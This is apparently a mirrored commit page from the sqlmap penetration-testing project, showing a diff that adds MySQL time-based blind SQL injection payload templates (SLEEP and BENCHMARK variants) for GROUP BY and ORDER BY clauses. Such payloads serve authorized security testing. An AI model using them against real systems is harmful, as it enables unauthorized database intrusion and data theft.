mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
Merge branch 'master' of github.com:sqlmapproject/sqlmap
This commit is contained in:
commit
a4f5c1d2b5
|
@ -2836,6 +2836,49 @@ Formats:
|
||||||
<!-- End of OR time-based blind tests -->
|
<!-- End of OR time-based blind tests -->
|
||||||
|
|
||||||
|
|
||||||
|
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||||
|
<test>
|
||||||
|
<title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>2</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
<dbms_version>>= 5.0.11</dbms_version>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>MySQL < 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>2</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[DELAYED]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>MySQL</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
<!-- TODO: add tests for other DBMSes -->
|
||||||
|
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
|
||||||
|
|
||||||
|
|
||||||
<!-- UNION query tests -->
|
<!-- UNION query tests -->
|
||||||
<test>
|
<test>
|
||||||
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user